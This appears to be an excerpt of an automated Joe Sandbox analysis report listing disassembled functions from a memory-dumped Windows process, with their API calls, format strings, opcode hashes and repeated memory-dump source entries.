                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: da80ccf33cbde9d5a253a4806190b127e11eb480f2988ab0a90b23502bddbcb2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86A1AE22A1864B85FB51AF15A45167DB6A0FF89B80FC14136ED4F877B1DFBCE4818720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153FB54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$DiskFreeSpace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %5lu
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2448137811-2100233843
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0c4d136cba260aba10831264e44f84f7b6b9f71eba0c2a0d70ec0529d3ef7ca6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3415026708ACA85EB61EB51E8446EEB361FB84784FC08036DA4E4B768DFBCD149C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151D250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: GeToken: (%x) '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2081463915-1994581435
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5f0f9fde0766a32344fe05ab7abfab6a12cbe1256ccf7d05b5b8ee0778a6fda9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3716621E0824F85FB66BB24A8582BDB2A0AF01754FD5053BE91F426B1DFFCE4918270
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15181D4 Relevance: 4.8, APIs: 3, Instructions: 299COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1497570035-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f3e601312093924fc21d6377505233d0512726af247fdb028598b36a13859534
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7C1D122B1864B86FB61BB1194502BDF6A0FF84784FC54177EA5F876B5DEBCE4808720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1537B4C Relevance: 4.8, APIs: 3, Instructions: 269fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3541575487-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 827dbbd7d9bfba9c364b646c9bfc584549d4f521effd7bafa0e5a1b763fa9919
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6A12462F0829B45FF54AB65941427DE2A0AF44BE0FC44236DE6F477E4EEBCE4408320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1516BE0 Relevance: 4.7, APIs: 3, Instructions: 184COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _pipe.MSVCRT ref: 00007FF7D1516C1E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1516CD1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7D1516CFB
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 624391571-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 292e6da38e71ef71e2f2a3caef43c3e6bfd8ba500022e968cf64b41b70382d25
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20718C31A0860B8AF755BF24D85007DB6A1EF45764BD58236E61F472B6CFBCE4818730
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15363FC Relevance: 4.7, APIs: 3, Instructions: 179threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4268342597-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3b47736ff1ca356a3b724aa5994a5f027a2b6a3aa683805b3d8ece31891a7df2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89815C22A08B8B85FB64AF25A44023DB7A1FF45B84FD8413AC94E077B4DFBDE5518760
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15288C0 Relevance: 4.6, APIs: 3, Instructions: 68nativethreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: OpenToken$CloseProcessThread
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2991381754-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: ed938d1a9808ab95a6284c07f4c2376fcf38d0d748b88994fc10049ead17effa
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1217172B0865B87F740AB94D44027DF7A0EB857A0FD04176EB5A836A4DFBCE848CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151586C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF7D153C59E), ref: 00007FF7D1515879
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15158D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D1515903
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15158D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D1515943
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15158D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D1515956
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CloseOpenQueryValueVersion
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %d.%d.%05d.%d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2996790148-3457777122
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d7f7b0fd7ae5a628505765dfeebf71175aafe68e9c306ee800991fbb63fdc205
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ADF0A762A1838A97E350AF15B44006EF651FB88780FD04135D94B07B6ACF7CD554CB50
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1527854 Relevance: 3.3, APIs: 2, Instructions: 296COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$ErrorFileFindFirstLast
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2831795651-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 34f645f5c86efc0bd8e314808c067c4c3c4a7cbfbdbdaf0d964846df1b52e835
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4a8484c3a7a587e9fce9f27ec1f655c42d5bf0b8d566bda98ba7ffdf9e594ab7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34f645f5c86efc0bd8e314808c067c4c3c4a7cbfbdbdaf0d964846df1b52e835
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7D1AC77A0868B86FB60EF20E4502AEB7A0FB54794FD01176DA4E877A8DFBCD5418710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1517D30 Relevance: 3.3, APIs: 2, Instructions: 252COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00007FF7D1517DA1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D152417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7D15241AD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D46E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D485
